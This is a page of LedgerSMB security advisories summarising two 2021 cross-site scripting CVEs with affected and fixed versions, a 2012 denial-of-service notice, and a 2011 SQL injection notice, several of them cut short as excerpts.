Security advisory

Security advisory for CVE-2021-3693 (Cross site scripting)

Submitted by ehu on Fri, 08/20/2021 - 03:14

DOM cross-site scripting of authenticated users in LedgerSMB

Summary

LedgerSMB does not check the origin of HTML fragments merged into the browser's DOM.  By sending a specially crafted URL to an authenticated user, this flaw can be abused for remote code execution and information disclosure.


Known vulnerable

  All of:

  - 1.5.0 upto 1.5.30 (including)
  - 1.6.0 upto 1.6.33 (including)
  - 1.7.0 upto 1.7.32 (including)
  - 1.8.0 upto 1.8.17 (including)


Known fixed

  - 1.7.33
  - 1.8.18

Security advisory for CVE-2021-3694 (Cross site scripting)

Submitted by ehu on Fri, 08/20/2021 - 03:13

Reflected cross-site scripting of authenticated users in LedgerSMB

Summary

LedgerSMB does not sufficiently HTML-encode error messages sent to the browser.  By sending a specially crafted URL to an authenticated user, this flaw can be abused for remote code execution and information disclosure.

Known vulnerable

  All of:

Security: Denial of Service Vulnerability in 1.3.20 and below

Submitted by Chris Travers on Mon, 07/30/2012 - 00:08

A security oversight has been discovered in LedgerSMB 1.3 which could allow a malicious user to cause a denial of service against LedgerSMB or otherwise affect the way in which certain forms of data would get entered.  In most cases we do not believe this to be particularly severe in the presence of internal process controls.  Users in some jurisdictions however may need to take this more seriously (see full details below).

Basic vulnerability characteristics

Security advisory: SQL Injection in LedgerSMB 1.2.24 and lower

Submitted by Chris Travers on Fri, 08/19/2011 - 14:59

Hi all;

The LedgerSMB development team has found an SQL injection issue in LedgerSMB 1.2.24. Because this issue stems from our common SQL-Ledger heritage, it affects all versions of LedgerSMB and has been confirmed in SQL-Ledger 2.8.33. We contacted Dieter when we initially discovered this and now three weeks later it is doubtful when this will be fixed on his side (his last communication said it was likely to be at least a few more weeks from present with no committed timeline). It is expected that when SQL-Ledger 2.8.34 is released it will contain a fix for this issue.